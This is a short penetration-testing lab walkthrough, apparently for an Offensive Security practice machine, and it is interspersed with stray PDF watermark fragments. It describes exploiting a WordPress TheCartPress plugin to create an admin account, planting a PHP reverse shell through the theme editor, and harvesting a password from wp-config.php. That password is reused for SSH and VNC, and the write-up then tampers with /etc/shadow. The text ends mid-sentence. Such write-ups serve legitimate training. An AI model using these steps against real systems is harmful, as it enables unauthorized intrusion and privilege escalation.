Professional Documents
Culture Documents
110_21..22..80_NEW
110_21..22..80_NEW
i to
.110
Initial shell
Ed
DF
rP
te
Wordpress running on port 80 can be scanned with wpscan or thecartpress plugin is detected by
looking directly at the source code.
https://www.exploit-db.com/exploits/50378
python3 50378.py http://targetIP
M
"tcp_new_user_pass" : "admin1234",
"tcp_repeat_user_pass" : "admin1234",
"tcp_new_user_email" : "test@test.com",
"tcp_role" : "administrator"
ed
After admin Go to theme editor, use pentest monkey php reverse shell instead of archive.php. Visit
archive.php and you will get the reverse shell.
at
https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
re
r
i to
Visit site and you have rev shell
The imported shell will give you www-data as user. Then use linpeas.sh. It will give you a password in
wp config.php.
Ed
Full file path: /srv/www/wordpress/wp-config.php
With this password, the user in the home can be logged in.
DF
rP
Jsmith:tequieromucho
Now lateral movement is done. Ssh is done with the password found.
Bring the port to the local machine with SSH remote port forwarding.
M
To log in, we must use the password we found in the config file before.
in
vncviewer127.0.0.1:5901
tequieromucho
ed
Session will be opened as root, but only type and cat can be used by Off sec rules.
Since we are root, we ensure that the root hash in /etc/shadow is the same as the jsmith hash. By
this means
at